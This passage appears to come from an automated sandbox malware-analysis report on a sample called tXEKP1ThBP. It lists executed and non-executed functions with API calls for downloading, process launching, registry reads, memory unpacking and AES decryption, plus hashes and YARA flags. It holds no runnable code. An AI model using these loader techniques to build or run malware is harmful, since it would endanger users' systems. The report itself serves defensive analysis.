call 10005926 1132->1137 1133->1127 1138 100014c0-100014d1 call 10003c40 call 10005926 1136->1138 1139 100014ae-100014be call 100050e0 1136->1139 1149 100014d7 call 1000584c 1137->1149 1138->1149 1139->1133 1140->1128 1146 10001423-10001425 1141->1146 1147 10001434-10001447 call 10003c40 1141->1147 1146->1147 1152 10001427-10001432 call 100050e0 1146->1152 1159 10001456-1000145c 1147->1159 1160 10001449-10001454 call 10005926 1147->1160 1149->1133 1152->1140 1159->1140 1164 1000145e-10001463 call 10005926 1159->1164 1167 10001469 call 1000584c 1160->1167 1164->1167 1167->1140
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                      • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                      • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                      • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                      • String ID: text
                                                      • API String ID: 1154000607-999008199
                                                      • Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                      • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                      • Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                      • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                                      Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                        • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: .exe$open
                                                      • API String ID: 1627157292-49952409
                                                      • Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                      • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                      • Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                      • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                                      Function 00401D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1237 401d60-401dae 1238 401db2-401db7 1237->1238 1238->1238 1239 401db9-402013 call 402470 call 402650 call 402470 call 40a3e0 call 40c34c InternetOpenA 1238->1239 1254 402015-402021 1239->1254 1255 40203d-40205a call 408ec2 1239->1255 1256 402033-40203a call 409027 1254->1256 1257 402023-402031 1254->1257 1256->1255 1257->1256 1259 402062-402099 call 40c26f call 401d60 1257->1259
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: http://
                                                      • API String ID: 0-1121587658
                                                      • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                      • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                                      • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                      • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4
                                                      Function 0099816B Relevance: 4.6, APIs: 3, Instructions: 100registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1268 99816b-999d63 1273 999d8c-999da7 RegOpenKeyA 1268->1273 1274 999d65-999d80 RegOpenKeyA 1268->1274 1276 999da9-999db3 1273->1276 1277 999dbf-999deb 1273->1277 1274->1273 1275 999d82 1274->1275 1275->1273 1276->1277 1280 999df8-999e02 1277->1280 1281 999ded-999df6 GetNativeSystemInfo 1277->1281 1282 999e0e-999e1c 1280->1282 1283 999e04 1280->1283 1281->1280 1285 999e28-999e2f 1282->1285 1286 999e1e 1282->1286 1283->1282 1287 999e42-99afbb 1285->1287 1288 999e35-999e3c 1285->1288 1286->1285 1288->1287 1289 999acd-999ad4 1288->1289 1291 999ada-999aed 1289->1291 1292 998ef6-99a172 1289->1292
                                                      APIs
                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00999D78
                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00999D9F
                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 00999DF6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000995000.00000040.00000001.01000000.00000003.sdmp, Offset: 00995000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_995000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Open$InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1247124224-0
                                                      • Opcode ID: c29215a690843e09429632424195e39b1ebc3a4e4ee6f5847a10cd11e7b2192f
                                                      • Instruction ID: 3dd808d6deb4ab4a19197afaa13c61177f7b920b83736062d54846fabc3188fe
                                                      • Opcode Fuzzy Hash: c29215a690843e09429632424195e39b1ebc3a4e4ee6f5847a10cd11e7b2192f
                                                      • Instruction Fuzzy Hash: CA419F7200418ECFEF11DF68C988BEF37A8EF06315F500A2AE94296941D7764DA4CF99
                                                      Function 00999D2A Relevance: 4.6, APIs: 3, Instructions: 75registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1295 999d2a-999d63 1298 999d8c-999da7 RegOpenKeyA 1295->1298 1299 999d65-999d80 RegOpenKeyA 1295->1299 1301 999da9-999db3 1298->1301 1302 999dbf-999deb 1298->1302 1299->1298 1300 999d82 1299->1300 1300->1298 1301->1302 1305 999df8-999e02 1302->1305 1306 999ded-999df6 GetNativeSystemInfo 1302->1306 1307 999e0e-999e1c 1305->1307 1308 999e04 1305->1308 1306->1305 1310 999e28-999e2f 1307->1310 1311 999e1e 1307->1311 1308->1307 1312 999e42-99afbb 1310->1312 1313 999e35-999e3c 1310->1313 1311->1310 1313->1312 1314 999acd-999ad4 1313->1314 1316 999ada-999aed 1314->1316 1317 998ef6-99a172 1314->1317
                                                      APIs
                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00999D78
                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00999D9F
                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 00999DF6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000995000.00000040.00000001.01000000.00000003.sdmp, Offset: 00995000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_995000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Open$InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1247124224-0
                                                      • Opcode ID: 36cffde5acde2c4430607b430f8be0ea975925a89189983a6df5440710fcc1f9
                                                      • Instruction ID: bd38b2752121a78547755ea3134da0d6c409d1153f241c8340c0754fe89a09e2
                                                      • Opcode Fuzzy Hash: 36cffde5acde2c4430607b430f8be0ea975925a89189983a6df5440710fcc1f9
                                                      • Instruction Fuzzy Hash: 1431367100018EDFEF11DF68C988BEE3BA8EF16315F44092AE942C6951D7768DA4CF59
                                                      Function 00998A06 Relevance: 4.6, APIs: 3, Instructions: 74registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1320 998a06-999d63 1323 999d8c-999da7 RegOpenKeyA 1320->1323 1324 999d65-999d80 RegOpenKeyA 1320->1324 1326 999da9-999db3 1323->1326 1327 999dbf-999deb 1323->1327 1324->1323 1325 999d82 1324->1325 1325->1323 1326->1327 1330 999df8-999e02 1327->1330 1331 999ded-999df6 GetNativeSystemInfo 1327->1331 1332 999e0e-999e1c 1330->1332 1333 999e04 1330->1333 1331->1330 1335 999e28-999e2f 1332->1335 1336 999e1e 1332->1336 1333->1332 1337 999e42-99afbb 1335->1337 1338 999e35-999e3c 1335->1338 1336->1335 1338->1337 1339 999acd-999ad4 1338->1339 1341 999ada-999aed 1339->1341 1342 998ef6-99a172 1339->1342
                                                      APIs
                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00999D78
                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00999D9F
                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 00999DF6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000995000.00000040.00000001.01000000.00000003.sdmp, Offset: 00995000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_995000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Open$InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1247124224-0
                                                      • Opcode ID: 7240c4ebcca5d2086c39fc617dca84abe9efe920561732d49a8e8b5b487fa430
                                                      • Instruction ID: 7e5031a3c31618ee4b5cdd489ab4d4f31449481c60b82d108de0c5ae6e218a2f
                                                      • Opcode Fuzzy Hash: 7240c4ebcca5d2086c39fc617dca84abe9efe920561732d49a8e8b5b487fa430
                                                      • Instruction Fuzzy Hash: 1031367100418EDFEF11DF68C988BEE3BA8EF16315F44092AE94186941D7764CA4CF99
                                                      Function 004020C0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1345 4020c0-4020db 1346 40213b-40214c call 408ec2 1345->1346 1347 4020dd-4020e1 1345->1347 1347->1346 1348 4020e3-402101 CreateFileA 1347->1348 1348->1346 1350 402103-402130 WriteFile CloseHandle call 408ec2 1348->1350 1353 402135-402138 1350->1353
                                                      APIs
                                                      • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
                                                      • CloseHandle.KERNEL32(00000000), ref: 0040211E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleWrite
                                                      • String ID:
                                                      • API String ID: 1065093856-0
                                                      • Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                      • Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
                                                      • Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                      • Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758
                                                      Function 04B10E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000400,?,?,04B10223,?,?), ref: 04B10E19
                                                      • SetErrorMode.KERNEL32(00000000,?,?,04B10223,?,?), ref: 04B10E1E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction ID: be4eee19aa43bc43f722bb662f1f9f895ccb7095d62f9335d5608eac0e7ed9c6
                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction Fuzzy Hash: 68D0123254512877DB003A95DC09BCD7B1CDF09B62F408451FB0DD9480C770954046E5
                                                      Function 00A90AEE Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,6765D1C2,00000004,?), ref: 00A90B81
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000A90000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_a90000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 0edde41af5f227ad385423d5c95cc9bd6788e5e5e5a983bc54cf078f9f57e3a5
                                                      • Instruction ID: 24f5fb4dc1e68e7ff3be816c1e1d81ce840fa76553b74b14d7d16f29bdf92ab4
                                                      • Opcode Fuzzy Hash: 0edde41af5f227ad385423d5c95cc9bd6788e5e5e5a983bc54cf078f9f57e3a5
                                                      • Instruction Fuzzy Hash: 8AF0D6BA2441096EFB11DF50AD11EEF7BBDEBC2B64F308425F801D9401C2710D159639
                                                      Function 00A90B1C Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,6765D1C2,00000004,?), ref: 00A90B81
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000A90000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_a90000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: bf7dd13e79fcf55a65d5829d2c8c2b600dd59df80e18a2561cbaeded8df25968
                                                      • Instruction ID: 40e746afcc0c26d5e997a049632124dc1eec06a8eda8bd79fa440e4c597c22fe
                                                      • Opcode Fuzzy Hash: bf7dd13e79fcf55a65d5829d2c8c2b600dd59df80e18a2561cbaeded8df25968
                                                      • Instruction Fuzzy Hash: 85F0F4BA248249BEEB118F609911EAF7B79EB82760F308569F541CA442C2B24D155365
                                                      Function 0041249E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                      • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                                      • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                      • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                                      Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                      • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                      • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                      • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                      Function 0099812B Relevance: 1.5, APIs: 1, Instructions: 30libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000995000.00000040.00000001.01000000.00000003.sdmp, Offset: 00995000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_995000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 95e84debd2c5440f00c946cf0f53ab8e4bc731c175393f284a5b79f3e88647b3
                                                      • Instruction ID: 2b2f83b81116d47e7470aaef6728f50ff6f4b8dcb84f9ab707f1d7c026131d41
                                                      • Opcode Fuzzy Hash: 95e84debd2c5440f00c946cf0f53ab8e4bc731c175393f284a5b79f3e88647b3
                                                      • Instruction Fuzzy Hash: DDF01CF251C600EFE708AF18D9866BEB7E5EB98350F224C2CE2C593240E6346840DB96
                                                      Function 0040E268 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 0040E27B
                                                        • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                        • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID:
                                                      • API String ID: 1353095263-0
                                                      • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                      • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                                      • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                      • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                                      Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 10005C07
                                                        • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                        • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID:
                                                      • API String ID: 1353095263-0
                                                      • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                      • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                      • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                      • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                      Function 00CFB185 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00CFB1D6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2240532857.0000000000CFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_cfa000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction ID: 60bf9f37721d9518f828f4dee61f0c63a0402e71437e9a1f8b658e56862ab1d6
                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction Fuzzy Hash: 3E112B79A00208EFDB01DF98C985E98BBF5AF08350F158094FA489B362D771EA50EB91
                                                      Function 00402BF0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                      • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                                      • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                      • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                                      Function 00402C10 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                      • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                                      • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                      • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84

                                                      Non-executed Functions

                                                      Function 04B13B27 Relevance: 31.4, APIs: 9, Strings: 8, Instructions: 1645COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
                                                      • API String ID: 0-735762442
                                                      • Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                      • Instruction ID: 120dd836d751dfca3c0a487ce11eca32940eb59c0a29954c315712f9bab8966d
                                                      • Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                      • Instruction Fuzzy Hash: 4BE2BFB0D002589BEB29EF64CC54BEDB774EF50308F9041D8D5097B2A1EB756A88CFA5
                                                      Function 04B13727 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 04B137A7
                                                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B137CB
                                                      • _mbstowcs.LIBCMT ref: 04B1381E
                                                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B13835
                                                      • GetLastError.KERNEL32 ref: 04B1383F
                                                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B13867
                                                      • GetLastError.KERNEL32 ref: 04B13871
                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B13881
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B13943
                                                      • CryptDestroyKey.ADVAPI32(?), ref: 04B139B5
                                                      Strings
                                                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B13783
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
